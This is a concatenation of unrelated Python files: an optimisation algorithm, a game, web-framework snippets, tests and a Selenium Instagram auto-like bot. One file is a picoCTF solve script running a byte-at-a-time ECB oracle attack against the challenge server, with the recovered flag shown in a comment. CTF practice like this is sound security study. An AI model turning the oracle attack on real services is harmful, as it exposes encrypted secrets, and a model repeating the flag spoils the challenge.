raise e.ValueError('`S` should be between 0 and 1')
self._S = S
@property
def R(self):
"""float: Percentage of roaming lions.
"""
return self._R
@R.setter
def R(self, R):
if not isinstance(R, (float, int)):
raise e.TypeError('`R` should be a float or integer')
if R < 0 or R > 1:
raise e.ValueError('`R` should be between 0 and 1')
self._R = R
@property
def I(self):
"""float: Immigrate rate.
"""
return self._I
@I.setter
def I(self, I):
if not isinstance(I, (float, int)):
raise e.TypeError('`I` should be a float or integer')
if I < 0 or I > 1:
raise e.ValueError('`I` should be between 0 and 1')
self._I = I
@property
def Ma(self):
"""float: Mating probability.
"""
return self._Ma
@Ma.setter
def Ma(self, Ma):
if not isinstance(Ma, (float, int)):
raise e.TypeError('`Ma` should be a float or integer')
if Ma < 0 or Ma > 1:
raise e.ValueError('`Ma` should be between 0 and 1')
self._Ma = Ma
@property
def Mu(self):
"""float: Mutation probability.
"""
return self._Mu
@Mu.setter
def Mu(self, Mu):
if not isinstance(Mu, (float, int)):
raise e.TypeError('`Mu` should be a float or integer')
if Mu < 0 or Mu > 1:
raise e.ValueError('`Mu` should be between 0 and 1')
self._Mu = Mu
def compile(self, space):
"""Compiles additional information that is used by this optimizer.
Args:
space (Space): A Space object containing meta-information.
"""
# Replaces the current agents with a derived Lion structure
space.agents = [Lion(agent.n_variables, agent.n_dimensions, agent.lb,
agent.ub, agent.position, agent.fit) for agent in space.agents]
# Calculates the number of nomad lions and their genders
n_nomad = int(self.N * space.n_agents)
nomad_gender = d.generate_bernoulli_distribution(1 - self.S, n_nomad)
# Iterates through all possible nomads
for i, agent in enumerate(space.agents[:n_nomad]):
# Toggles to `True` the nomad property
agent.nomad = True
# Defines the gender according to Bernoulli distribution
agent.female = bool(nomad_gender[i])
# Calculates the gender of pride lions
pride_gender = d.generate_bernoulli_distribution(self.S, space.n_agents - n_nomad)
# Iterates through all possible prides
for i, agent in enumerate(space.agents[n_nomad:]):
# Defines the gender according to Bernoulli distribution
agent.female = bool(pride_gender[i])
# Allocates to the corresponding pride
agent.pride = i % self.P
def _get_nomad_lions(self, agents):
"""Gets all nomad lions.
Args:
agents (list): Agents.
Returns:
A list of nomad lions.
"""
# Returns a list of nomad lions
return [agent for agent in agents if agent.nomad]
def _get_pride_lions(self, agents):
"""Gets all non-nomad (pride) lions.
Args:
agents (list): Agents.
Returns:
A list of lists, where each one indicates a particular pride with its lions.
"""
# Gathers all non-nomad lions
agents = [agent for agent in agents if not agent.nomad]
# Returns a list of lists of prides
return [[agent for agent in agents if agent.pride == i] for i in range(self.P)]
def _hunting(self, prides, function):
"""Performs the hunting procedure (s. 2.2.2).
Args:
prides (list): List of prides holding their corresponding lions.
function (Function): A Function object that will be used as the objective function.
"""
# Iterates through all prides
for pride in prides:
# Iterates through all agents in pride
for agent in pride:
# If agent is female
if agent.female:
# Allocates to a random hunting group
agent.group = r.generate_integer_random_number(high=4)
# If agent is male
else:
# Allocates to a null group (no-hunting)
agent.group = 0
# Calculates the fitness sum of first, second and third groups
first_group = np.sum([agent.fit for agent in pride if agent.group == 1])
second_group = np.sum([agent.fit for agent in pride if agent.group == 2])
third_group = np.sum([agent.fit for agent in pride if agent.group == 3])
# Averages the position of the prey (lions in group 0)
prey = np.mean([agent.position for agent in pride if agent.group == 0], axis=0)
# Calculates the group indexes and their corresponding
# positions: center, left and right
groups_idx = np.argsort([first_group, second_group, third_group]) + 1
center = groups_idx[0]
left = groups_idx[1]
right = groups_idx[2]
# Iterates through all agents in pride
for agent in pride:
# If agent belongs to the center group
if agent.group == center:
# Iterates through all decision variables
for j in range(agent.n_variables):
# If agent's position is smaller than prey's
if agent.position[j] < prey[j]:
# Updates its position (eq. 5 - top)
agent.position[j] = r.generate_uniform_random_number(
agent.position[j], prey[j])
else:
# Updates its position (eq. 5 - bottom)
agent.position[j] = r.generate_uniform_random_number(
prey[j], agent.position[j])
# If agent belongs to the left or right groups
if agent.group in [left, right]:
# Iterates through all decision variables
for j in range(agent.n_variables):
# Calculates the encircling position
encircling = 2 * prey[j] - agent.position[j]
# If encircling's position is smaller than prey's
if encircling < prey[j]:
# Updates its position (eq. 4 - top)
agent.position[j] = r.generate_uniform_random_number(
encircling, prey[j])
else:
# Updates its position (eq. 4 - bottom)
agent.position[j] = r.generate_uniform_random_number(
prey[j], encircling)
# Clips their limits
agent.clip_by_bound()
# Defines the previous fitness and calculates the newer one
agent.p_fit = copy.deepcopy(agent.fit)
agent.fit = function(agent.position)
# If new fitness is better than old one
if agent.fit < agent.p_fit:
# Updates its best position
agent.best_position = copy.deepcopy(agent.position)
# Calculates the probability of improvement
p_improvement = agent.fit / agent.p_fit
# Updates the prey's position
r1 = r.generate_uniform_random_number()
prey += r1 * p_improvement * (prey - agent.position)
def _moving_safe_place(self, prides):
"""Move prides to safe locations (s. 2.2.3).
Args:
prides (list): List of prides holding their corresponding lions.
"""
# Iterates through all prides
for pride in prides:
# Calculates the number of improved lions (eq. 7)
n_improved = np.sum([1 for agent in pride if agent.fit < agent.p_fit])
# Calculates the fitness of lions (eq. 8)
fitnesses = [agent.fit for agent in pride]
# Calculates the size of tournament (eq. 9)
tournament_size = np.maximum(2, int(np.ceil(n_improved / 2)))
# Iterates through all agents in pride
for agent in pride:
# If agent is female and belongs to group 0
if agent.group == 0 and agent.female:
# Gathers the winning lion from tournament selection
w = g.tournament_selection(fitnesses, 1, tournament_size)[0]
# Calculates the distance between agent and winner
distance = g.euclidean_distance(agent.position, pride[w].position)
# Generates random numbers
rand = r.generate_uniform_random_number()
u = r.generate_uniform_random_number(-1, 1)
theta = r.generate_uniform_random_number(-np.pi / 6, np.pi / 6)
# Calculates both `R1` and `R2` vectors
R1 = pride[w].position - agent.position
R2 = np.random.randn(*R1.T.shape)
R2 = R2.T - R2.dot(R1) * R1 / (np.linalg.norm(R1) ** 2 + c.EPSILON)
# Updates agent's position (eq. 6)
agent.position += 2 * distance * rand * R1 + \
u * np.tan(theta) * distance * R2
def _roaming(self, prides, function):
"""Performs the roaming procedure (s. 2.2.4).
Args:
prides (list): List of prides holding their corresponding lions.
function (Function): A Function object that will be used as the objective function.
"""
# Iterates through all prides
for pride in prides:
# Calculates the number of roaming lions
n_roaming = int(len(pride) * self.P)
# Selects `n_roaming` lions
selected = r.generate_integer_random_number(high=len(pride), size=n_roaming)
# Iterates through all agents in pride
for agent in pride:
# If agent is male
if not agent.female:
# Iterates through selected roaming lions
for s in selected:
# Calculates the direction angle
theta = r.generate_uniform_random_number(-np.pi / 6, np.pi / 6)
# Calculates the distance between selected lion and current one
distance = g.euclidean_distance(pride[s].best_position, agent.position)
# Generates the step (eq. 10)
step = r.generate_uniform_random_number(0, 2 * distance)
# Updates the agent's position
agent.position += step * np.tan(theta)
# Clip the agent's limits
agent.clip_by_bound()
# Defines the previous fitness and calculates the newer one
agent.p_fit = copy.deepcopy(agent.fit)
agent.fit = function(agent.position)
# If new fitness is better than old one
if agent.fit < agent.p_fit:
# Updates its best position
agent.best_position = copy.deepcopy(agent.position)
def _mating_operator(self, agent, males, function):
"""Wraps the mating operator.
Args:
agent (Agent): Current agent.
males (list): List of males that will be breed.
function (Function): A Function object that will be used as the objective function.
Returns:
A pair of offsprings that resulted from mating.
"""
# Calculates the males average position
males_average = np.mean([male.position for male in males], axis=0)
# Generates a gaussian random number
beta = r.generate_gaussian_random_number(0.5, 0.1)
# Copies current agent into two offsprings
a1, a2 = copy.deepcopy(agent), copy.deepcopy(agent)
# Updates first offspring position (eq. 13)
a1.position = beta * a1.position + (1 - beta) * males_average
# Updates second offspring position (eq. 14)
a2.position = (1 - beta) * a2.position + beta * males_average
# Iterates though all decision variables
for j in range(agent.n_variables):
# Generates random numbers
r2 = r.generate_uniform_random_number()
r3 = r.generate_uniform_random_number()
# If first random number is smaller tha mutation probability
if r2 < self.Mu:
# Mutates the first offspring
a1.position[j] = r.generate_uniform_random_number(a1.lb[j], a1.ub[j])
# If second random number is smaller tha mutation probability
if r3 < self.Mu:
# Mutates the second offspring
a2.position[j] = r.generate_uniform_random_number(a2.lb[j], a2.ub[j])
# Clips both offspring bounds
a1.clip_by_bound()
a2.clip_by_bound()
# Updates first offspring properties
a1.best_position = copy.deepcopy(a1.position)
a1.female = bool(beta >= 0.5)
a1.fit = function(a1.position)
# Updates second offspring properties
a2.best_position = copy.deepcopy(a2.position)
a2.female = bool(beta >= 0.5)
a2.fit = function(a2.position)
return a1, a2
def _mating(self, prides, function):
"""Generates offsprings from mating (s. 2.2.5).
Args:
prides (list): List of prides holding their corresponding lions.
function (Function): A Function object that will be used as the objective function.
Returns:
Cubs generated from the mating procedure.
"""
# Creates a list of prides offsprings
prides_cubs = []
# Iterates through all prides
for pride in prides:
# Creates a list of current pride offsprings
cubs = []
# Iterates through all agents in pride
for agent in pride:
# If agent is female
if agent.female:
# Generates a random number
r1 = r.generate_uniform_random_number()
# If random number is smaller than mating probability
if r1 < self.Ma:
# Gathers a list of male lions that belongs to current pride
males = [agent for agent in pride if not agent.female]
# Performs the mating
a1, a2 = self._mating_operator(agent, males, function)
# Merges current pride offsprings
cubs += [a1, a2]
# Appends pride offspring into prides list
prides_cubs.append(cubs)
return prides_cubs
def _defense(self, nomads, prides, cubs):
"""Performs the defense procedure (s. 2.2.6).
Args:
nomads (list): Nomad lions.
prides (list): List of prides holding their corresponding lions.
cubs (Function): List of cubs holding their corresponding lions.
Returns:
Both updated nomad and pride lions.
"""
# Instantiate lists of new nprides lions
new_prides = []
for pride, cub in zip(prides, cubs):
# Gathers the females and males from current pride
pride_female = [agent for agent in pride if agent.female]
pride_male = [agent for agent in pride if not agent.female]
# Gathers the female and male cubs from current pride
cub_female = [agent for agent in cub if agent.female]
cub_male = [agent for agent in cub if not agent.female]
# Sorts the males from current pride
pride_male.sort(key=lambda x: x.fit)
# Gathers the new pride by merging pride's females, cub's females,
# cub's males and non-beaten pride's males
new_pride = pride_female + cub_female + cub_male + pride_male[:-len(cub_male)]
new_prides.append(new_pride)
# Gathers the new nomads
nomads += pride_male[-len(cub_male):]
return nomads, new_prides
def _nomad_roaming(self, nomads, function):
"""Performs the roaming procedure for nomad lions (s. 2.2.4).
Args:
nomads (list): Nomad lions.
function (Function): A Function object that will be used as the objective function.
"""
# Sorts nomads
nomads.sort(key=lambda x: x.fit)
# Iterates through all nomad agents
for agent in nomads:
# Gathers the best nomad fitness
best_fit = nomads[0].fit
# Calculates the roaming probability (eq. 12)
prob = 0.1 + np.minimum(0.5, (agent.fit - best_fit) / (best_fit + c.EPSILON))
# Generates a random number
r1 = r.generate_uniform_random_number()
# If random number is smaller than roaming probability
if r1 < prob:
# Iterates through all decision variables
for j in range(agent.n_variables):
# Updates the agent's position (eq. 11 - bottom)
agent.position[j] = r.generate_uniform_random_number(agent.lb[j], agent.ub[j])
# Clip the agent's limits
agent.clip_by_bound()
# Defines the previous fitness and calculates the newer one
agent.p_fit = copy.deepcopy(agent.fit)
agent.fit = function(agent.position)
# If new fitness is better than old one
if agent.fit < agent.p_fit:
# Updates its best position
agent.best_position = copy.deepcopy(agent.position)
def _nomad_mating(self, nomads, function):
"""Generates offsprings from nomad lions mating (s. 2.2.5).
Args:
nomads (list): Nomad lions.
function (Function): A Function object that will be used as the objective function.
Returns:
Updated nomad lions.
"""
# Creates a list of offsprings
cubs = []
# Iterates through all nomad agents
for agent in nomads:
# If agent is female
if agent.female:
# Generates a random number
r1 = r.generate_uniform_random_number()
# If random number is smaller than mating probability
if r1 < self.Ma:
# Gathers a list of male lions that belongs to current pride
# and samples a random integer
males = [agent for agent in nomads if not agent.female]
# If there is at least a male
if len(males) > 0:
# Gathers a random index
idx = r.generate_integer_random_number(high=len(males))
# Performs the mating
a1, a2 = self._mating_operator(agent, [males[idx]], function)
# Merges current pride offsprings
cubs += [a1, a2]
# Merges both initial nomads and cubs
nomads += cubs
return nomads
def _nomad_attack(self, nomads, prides):
"""Performs the nomad's attacking procedure (s. 2.2.6).
Args:
nomads (list): Nomad lions.
prides (list): List of prides holding their corresponding lions.
Returns:
Both updated nomad and pride lions.
"""
# Iterates through all nomads
for agent in nomads:
# If current agent is female
if agent.female:
# Generates a binary array of prides to be attacked
attack_prides = r.generate_binary_random_number(self.P)
# Iterates through every pride
for i, pride in enumerate(prides):
# If pride is supposed to be attacked
if attack_prides[i]:
# Gathers all the males in the pride
males = [agent for agent in pride if not agent.female]
# If there is at least a male
if len(males) > 0:
# If current nomad agent is better than male in pride
if agent.fit < males[0].fit:
# Swaps them
agent, males[0] = copy.deepcopy(males[0]), copy.deepcopy(agent)
return nomads, prides
def _migrating(self, nomads, prides):
"""Performs the nomad's migration procedure (s. 2.2.7).
Args:
nomads (list): Nomad lions.
prides (list): List of prides holding their corresponding lions.
Returns:
Both updated nomad and pride lions.
"""
# Creates a list to hold the updated prides
new_prides = []
# Iterates through all prides
for pride in prides:
# Calculates the number of females to be migrated
n_migrating = int(len(pride) * self.I)
# Selects `n_migrating` lions
selected = r.generate_integer_random_number(high=len(pride), size=n_migrating)
# Iterates through selected pride lions
for s in selected:
# If current agent is female
if pride[s].female:
# Migrates the female to nomads and defines its property
n = copy.deepcopy(pride[s])
n.nomad = True
# Appends the new nomad lion to the corresponding list
nomads.append(n)
# Appends non-selected lions to the new pride positions
new_prides.append([agent for i, agent in enumerate(pride) if i not in selected])
return nomads, new_prides
def _equilibrium(self, nomads, prides, n_agents):
"""Performs the population's equilibrium procedure (s. 2.2.8).
Args:
nomads (list): Nomad lions.
prides (list): List of prides holding their corresponding lions.
Returns:
Both updated nomad and pride lions.
"""
# Splits the nomad's population into females and males
nomad_female = [agent for agent in nomads if agent.female]
nomad_male = [agent for agent in nomads if not agent.female]
# Sorts both female and male nomads
nomad_female.sort(key=lambda x: x.fit)
nomad_male.sort(key=lambda x: x.fit)
# Calculates the correct size of each pride
correct_pride_size = int((1 - self.N) * n_agents / self.P)
# Iterates through all prides
for i in range(self.P):
# While pride is bigger than the correct size
while len(prides[i]) > correct_pride_size:
# Removes an agent
del prides[i][-1]
# While pride is smaller than correct size
while len(prides[i]) < correct_pride_size:
# Gathers the best female nomad and transform into a pride-based lion
nomad_female[0].pride = i
nomad_female[0].nomad = False
# Appens the female to the pride
prides[i].append(copy.deepcopy(nomad_female[0]))
# Removes from the nomads
del nomad_female[0]
# Merges both female and male nomads into a single population
# and sorts its according to their fitness
nomads = nomad_female + nomad_male
nomads.sort(key=lambda x: x.fit)
return nomads, prides
def _check_prides_for_males(self, prides):
"""Checks if there is at least one male per pride.
Args:
prides (list): List of prides holding their corresponding lions.
"""
# Gathers the amount of males per pride
males_prides = [len([agent for agent in pride if not agent.female]) for pride in prides]
# Iterates through all prides
for males_per_pride, pride in zip(males_prides, prides):
# If there is no male in current pride
if males_per_pride == 0:
# Selects a random index and turns into a male
idx = r.generate_integer_random_number(high=len(pride))
pride[idx].female = False
def update(self, space, function):
"""Wraps Lion Optimization Algorithm over all agents and variables.
Args:
space (Space): Space containing agents and update-related information.
function (Function): A Function object that will be used as the objective function.
"""
# Gets nomad and non-nomad (pride) lions
nomads = self._get_nomad_lions(space.agents)
prides = self._get_pride_lions(space.agents)
# Performs the hunting procedure, moving, roaming,
# mating and defending for pride lions (step 3)
self._hunting(prides, function)
self._moving_safe_place(prides)
self._roaming(prides, function)
pride_cubs = self._mating(prides, function)
nomads, prides = self._defense(nomads, prides, pride_cubs)
# Performs roaming, mating and attacking
# for nomad lions (step 4)
self._nomad_roaming(nomads, function)
nomads = self._nomad_mating(nomads, function)
nomads, prides = self._nomad_attack(nomads, prides)
# Migrates females lions from prides (step 5)
nomads, prides = self._migrating(nomads, prides)
# Equilibrates the nomads and prides population (step 6)
nomads, prides = self._equilibrium(nomads, prides, space.n_agents)
# Checks if there is at least one male per pride
self._check_prides_for_males(prides)
# Defines the correct splitting point, so
# the agents in space can be correctly updated
correct_nomad_size = int(self.N * space.n_agents)
# Updates the nomads
space.agents[:correct_nomad_size] = copy.deepcopy(nomads[:correct_nomad_size])
# Updates the prides
space.agents[correct_nomad_size:] = copy.deepcopy(
list(itertools.chain.from_iterable(prides)))
|
#!/usr/bin/env python2
from pwn import *
import sys
import string
MSG = """Agent,
Greetings. My situation report is as follows:
My agent identifying code is: .
Down with the Soviets,
006
"""
context.log_level = 'error'
def encrypt(payload):
r = remote("2018shell.picoctf.com",37131)
r.recvuntil('Please enter your situation report: ')
r.sendline(payload)
cipher = r.recvline().strip().decode('hex')
r.close()
return cipher
def getFlagLength():
known_len = len(MSG)
cipher_len = len(encrypt(''))
padding_len = 0
while True:
new_len = len(encrypt((padding_len+1)*'A'))
if new_len > cipher_len:
break
padding_len+=1
return cipher_len - padding_len - known_len
"""
Agent, Greetings
. My situation r
eport is as foll
ows: XXXXXXXXXXX
fying code is: ?
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
My agent identi
fying code is: p
icoCTF{@g3nt6_1$
_th3_c00l3$t_128
9389} Down with
the Soviets, 006
"""
def readSecret(secretLength):
injectionOffset = 53
secretOffset = 84
alignment1Length = (-injectionOffset)%16 # we want to put knownPlaintext in a new block
alignment2Length = secretLength+(-secretLength)%16 # just to ensure "real_block_offset" doesn't change later
newSecretOffset = secretOffset+alignment1Length+16+alignment2Length
alignment3Length = (15-newSecretOffset)%16 # we want first byte of the secret to be the last byte of previous block
knownPlaintext = MSG[secretOffset-15:secretOffset]
fake_block_offset = injectionOffset+alignment1Length
real_block_offset = newSecretOffset+alignment3Length-15
secret = ""
sys.stdout.write("[*] Reading secret...: ")
for i in range(secretLength):
for c in string.printable:
cipher = encrypt('x'*alignment1Length + knownPlaintext + c + 'y'*alignment2Length + 'z'*alignment3Length)
if cipher[fake_block_offset:fake_block_offset+16]==cipher[real_block_offset:real_block_offset+16]:
secret += c
knownPlaintext = knownPlaintext[1:]+c
alignment2Length -= 1
sys.stdout.write(c)
sys.stdout.flush()
break
sys.stdout.write("\n")
sys.stdout.flush()
return secret
flagLen = getFlagLength()
print("Flag length: %d"%flagLen)
flag = readSecret(flagLen)
print("Flag: %s"%flag) |
import attr
from clime import clime
@attr.s(auto_attribs=True)
class Dude:
likes_ice_cream: bool = False
def declare_ice_cream_status(self):
negate = " do not" if not self.likes_ice_cream else ""
print(f"hi! i{negate} like ice cream")
def main():
clime(Dude).declare_ice_cream_status()
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import fields, models
from odoo.tools.translate import _
class MailingList(models.Model):
_inherit = 'mailing.list'
def _default_toast_content(self):
return _('<p>Thanks for subscribing!</p>')
website_popup_ids = fields.One2many('website.mass_mailing.popup', 'mailing_list_id', string="Website Popups")
toast_content = fields.Html(default=_default_toast_content, translate=True)
|
from queue import deque
import numpy as np
class Snake():
"""
The Snake class holds all pertinent information regarding the Snake's movement and boday.
The position of the snake is tracked using a queue that stores the positions of the body.
Note:
A potentially more space efficient implementation could track directional changes rather
than tracking each location of the snake's body.
"""
UP = 0
RIGHT = 1
DOWN = 2
LEFT = 3
def __init__(self, head_coord_start, length=3):
"""
head_coord_start - tuple, list, or ndarray denoting the starting coordinates for the snake's head
length - starting number of units in snake's body
"""
self.direction = self.DOWN
self.head = np.asarray(head_coord_start).astype(np.int)
self.head_color = np.array([255,0,0], np.uint8)
self.body = deque()
for i in range(length-1, 0, -1):
self.body.append(self.head-np.asarray([0,i]).astype(np.int))
def step(self, coord, direction):
"""
Takes a step in the specified direction from the specified coordinate.
coord - list, tuple, or numpy array
direction - integer from 1-4 inclusive.
0: up
1: right
2: down
3: left
"""
assert direction < 4 and direction >= 0
if direction == self.UP:
return np.asarray([coord[0], coord[1]-1]).astype(np.int)
elif direction == self.RIGHT:
return np.asarray([coord[0]+1, coord[1]]).astype(np.int)
elif direction == self.DOWN:
return np.asarray([coord[0], coord[1]+1]).astype(np.int)
else:
return np.asarray([coord[0]-1, coord[1]]).astype(np.int)
def action(self, direction):
"""
This method sets a new head coordinate and appends the old head
into the body queue. The Controller class handles popping the
last piece of the body if no food is eaten on this step.
The direction can be any integer value, but will be collapsed
to 0, 1, 2, or 3 corresponding to up, right, down, left respectively.
direction - integer from 0-3 inclusive.
0: up
1: right
2: down
3: left
"""
# Ensure direction is either 0, 1, 2, or 3
direction = (int(direction) % 4)
if np.abs(self.direction-direction) != 2:
self.direction = direction
self.body.append(self.head)
self.head = self.step(self.head, self.direction)
return self.head
|
from django.conf.urls import url, include
from App import views
urlpatterns = [
url(r'^index/',views.index,name='index')
] |
from django.http import HttpResponse
def homepage(request):
html = """
<html>
<body>
<h1>Zacni ucit</h1>
<ul>
<li><a href="/admin/">Administrace</a></li>
<li><a href="/" onclick="window.location.port=7474; return false;">Neo4j konzole</a></li>
<li><a href="/graphql/">GraphQl</a></li>
<li><a href="https://wiki.cesko.digital/pages/viewpage.action?pageId=1577190">Wiki</a></li>
<li>Slack <a href="https://cesko-digital.slack.com/archives/C01CDSTV8KF">obecny</a>, <a href="https://cesko-digital.slack.com/archives/C01KFLXMH5Y">vyvojarsky</a></li>
<li><a href="https://github.com/cesko-digital/zacni-ucit">GitHub</a></li>
</ul>
</body>
</html>
"""
return HttpResponse(html)
|
import time
from castero.player import Player, PlayerDependencyError
class MPVPlayer(Player):
"""The MPVPlayer class.
"""
NAME = "mpv"
def __init__(self, title, path, episode) -> None:
"""Initializes the object.
Overrides method from Player; see documentation in that class.
"""
super().__init__(title, path, episode)
import mpv
self.mpv = mpv
@staticmethod
def check_dependencies():
"""Checks whether dependencies are met for playing a player.
Overrides method from Player; see documentation in that class.
"""
try:
import mpv
except OSError:
raise PlayerDependencyError(
"Dependency mpv not found, which is required for playing"
" media files"
)
def _create_player(self) -> None:
"""Creates the player object while making sure it is a valid file.
Overrides method from Player; see documentation in that class.
"""
self._player = self.mpv.Context()
self._player.initialize()
self._player.set_option('vid', False)
self._player.set_property('pause', True)
self._player.command('loadfile', self._path)
self._duration = self._player.time
def play(self) -> None:
"""Plays the media.
Overrides method from Player; see documentation in that class.
"""
if self._player is None:
self._create_player()
self._player.set_property('pause', False)
self._state = 1
def stop(self) -> None:
"""Stops the media.
Overrides method from Player; see documentation in that class.
"""
if self._player is not None:
self._player.shutdown()
self._state = 0
def pause(self) -> None:
"""Pauses the media.
Overrides method from Player; see documentation in that class.
"""
if self._player is not None:
self._player.set_property('pause', True)
self._state = 2
def seek(self, direction, amount) -> None:
"""Seek forward or backward in the media.
Overrides method from Player; see documentation in that class.
"""
assert direction == 1 or direction == -1
if self._player is not None:
self._player.command('seek', direction * amount)
@property
def duration(self) -> int:
"""int: the duration of the player"""
try:
return self._player.get_property('duration') * 1000
except self.mpv.MPVError:
return 5000
@property
def time(self) -> int:
"""int: the current time of the player"""
if self._player is not None:
try:
return self._player.get_property('playback-time') * 1000
except self.mpv.MPVError:
return 0
@property
def time_str(self) -> str:
"""str: the formatted time and duration of the player"""
result = "00:00:00/00:00:00"
if self._player is not None:
time_seconds = int(self.time / 1000)
length_seconds = int(self.duration / 1000)
t = time.strftime('%H:%M:%S', time.gmtime(time_seconds))
d = time.strftime('%H:%M:%S', time.gmtime(length_seconds))
result = "%s/%s" % (t, d)
return result
|
# coding=utf-8
# Copyright 2019 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow as tf
from axial import config_imagenet32
from axial import config_imagenet64
from axial import datasets
from axial import models
from axial import worker_util
FLAGS = flags.FLAGS
flags.DEFINE_string('master', None, '')
flags.DEFINE_string('logdir', None, '')
flags.DEFINE_integer('seed', 0, '')
flags.DEFINE_string('config', None, 'imagenet32 or imagenet64')
flags.mark_flag_as_required('logdir')
flags.mark_flag_as_required('config')
def main(_):
if FLAGS.config == 'imagenet32':
config = config_imagenet32.get_config()
elif FLAGS.config == 'imagenet64':
config = config_imagenet64.get_config()
else:
raise ValueError(config)
logging.info('config: {}'.format(config))
# Seeding
tf.set_random_seed(FLAGS.seed)
np.random.seed(FLAGS.seed)
# Model
def model_constructor():
return getattr(models, config.model_name)(config.model_config)
# Dataset
dataset = datasets.get_dataset(config.dataset_name,
**config.dataset_config.values())
worker_util.run_eval(
model_constructor=model_constructor,
logdir=FLAGS.logdir,
total_bs=config.eval_total_bs,
master=FLAGS.master,
input_fn=dataset.eval_input_fn,
dataset_size=dataset.get_size(is_train=False))
if __name__ == '__main__':
app.run(main)
|
import retrieve
import validation
from time_functions import time_delay
from selenium.webdriver import ActionChains
def like_pic(browser):
heart = retrieve.like_button(browser)
time_delay()
if validation.already_liked(heart):
heart.click()
def like_pic_in_feed(browser, number = 1):
loop = 1
while loop <= number:
hearts = retrieve.feed_like_buttons(browser)
for h in range(len(hearts)):
#print('liking the pic {}'.format(str(self.loop + 1)))
time_delay()
if validation.already_liked(hearts[h]):
actions = ActionChains(browser)
actions.move_to_element(hearts[h])
actions.click(hearts[h])
actions.perform()
loop = loop + 1
if loop > number:
break
|
import pytest
from prometheus_ecs_discoverer import toolbox
def test_chunk_list_with_even_size():
big_list = list(range(100))
chunks = toolbox.chunk_list(big_list, 10)
assert len(chunks) == 10
for chunk in chunks:
assert len(chunk) <= 10
def test_chunk_list_with_uneven_size():
big_list = list(range(103))
chunks = toolbox.chunk_list(big_list, 10)
assert len(chunks) == 11
for chunk in chunks:
assert len(chunk) <= 10
assert len(chunks[-1]) == 3
def test_extract_set():
dct = {
"descr1": {"att1": "fefefe", "att2": "fefegtrafgrgr"},
"descr2": {"att1": "OGOGOGO", "att2": "fefegtrafgrgr"},
"descr3": {"att1": "OGOGOGO", "att2": "fefegtrafgrgr"},
}
extract = toolbox.extract_set(dct, "att1")
assert len(extract) == 2
assert extract == {"fefefe", "OGOGOGO"}
def test_list_to_dict():
lst = [{"key1": "hallo", "key2": "my"}, {"key1": "old", "key2": "friend"}]
dct = toolbox.list_to_dict(lst, "key1")
assert dct == {
"hallo": {"key1": "hallo", "key2": "my"},
"old": {"key1": "old", "key2": "friend"},
}
def test_print_structure():
lst = [{"key1": "hallo", "key2": "my"}, {"key1": "old", "key2": "friend"}]
toolbox.pstruct(lst)
assert True
def test_validate_min_len():
lst = [{"this": "dict", "is": "too long"}, {"good": {"dict": "only", "len": "one"}}]
with pytest.raises(ValueError):
toolbox.validate_min_len(min_len=10, collections=lst)
toolbox.validate_min_len(min_len=1, collections=lst)
assert True
# ------------------------------------------------------------------------------
def test_extract_env_var():
container = {
"random": {"random": "random"},
"environment": [
{"name": "PROMETHEUS_PORT", "value": "80"},
{"name": "SOMETINGELSE", "value": "fefefwe"},
],
}
assert "80" == toolbox.extract_env_var(container, "PROMETHEUS_PORT")
assert None is toolbox.extract_env_var(container, "does not exist")
def test_extract_env_var_no_env():
container = {
"random": {"random": "random"},
}
assert None is toolbox.extract_env_var(container, "PROMETHEUS_PORT")
# ------------------------------------------------------------------------------
def test_extract_env_var_no_environment():
container = {"random": {"random": "random"}}
assert None is toolbox.extract_env_var(container, "does not exist")
|
import csv
import os
import shutil
import sys
import tempfile
import unittest
from pyspark import StorageLevel
from pyspark.sql import Row
from sourced.ml.utils import create_engine, SparkDefault
from sourced.ml.transformers import ParquetSaver, ParquetLoader, Collector, First, \
Identity, FieldsSelector, Repartitioner, DzhigurdaFiles, CsvSaver, Rower, \
PartitionSelector, Sampler, Distinct, Cacher, Ignition, HeadFiles, LanguageSelector, \
UastExtractor, UastDeserializer, UastRow2Document, RepositoriesFilter
from sourced.ml.tests.models import PARQUET_DIR, SIVA_DIR
class BasicTransformerTests(unittest.TestCase):
@classmethod
@unittest.skipUnless(sys.version_info < (3, 7), "Python 3.7 is not yet supported")
def setUpClass(cls):
cls.engine = create_engine("test_with_engine", SIVA_DIR, "siva")
cls.spark = cls.engine.session
cls.data = ParquetLoader(session=cls.spark, paths=PARQUET_DIR).execute().rdd.coalesce(1)
def test_repartitioner(self):
partitions = 2
# coalesce without shuffle cannot make more partitions, only concatenate them
# it is a shuffle flag check.
repartitioned_data = Repartitioner(partitions, shuffle=False)(self.data)
self.assertEqual(1, repartitioned_data.getNumPartitions())
repartitioned_data = Repartitioner(partitions, shuffle=True)(self.data)
self.assertEqual(partitions, repartitioned_data.getNumPartitions())
repartitioned_data = Repartitioner.maybe(partitions, shuffle=True, multiplier=2)(self.data)
self.assertEqual(partitions * 2, repartitioned_data.getNumPartitions())
repartitioned_data = Repartitioner.maybe(None, shuffle=False)(self.data)
self.assertEqual(1, repartitioned_data.getNumPartitions())
repartitioned_data = Repartitioner.maybe(partitions, keymap=lambda x: x[0])(self.data)
self.assertEqual(repartitioned_data.count(), 6)
def test_partition_selector(self):
partitioned_data = PartitionSelector(partition_index=0)(self.data)
self.assertEqual(partitioned_data.count(), 6)
def test_sampler(self):
sampled_data = Sampler()(self.data)
self.assertEqual(sampled_data.count(), 2)
def test_parquet_loader(self):
# load parquet and check number of rows
loader = ParquetLoader(session=self.spark, paths=(PARQUET_DIR, PARQUET_DIR))
data = loader.execute()
self.assertEqual(data.count(), 6 * 2)
loader = ParquetLoader(session=self.spark, paths=PARQUET_DIR)
data = loader.execute()
self.assertEqual(data.count(), 6)
self.assertEqual(loader.paths, PARQUET_DIR)
self.assertNotIn("session", loader.__getstate__())
with self.assertRaises(ValueError):
loader = ParquetLoader(session=self.spark, paths=None)
data = loader.execute()
def test_rower(self):
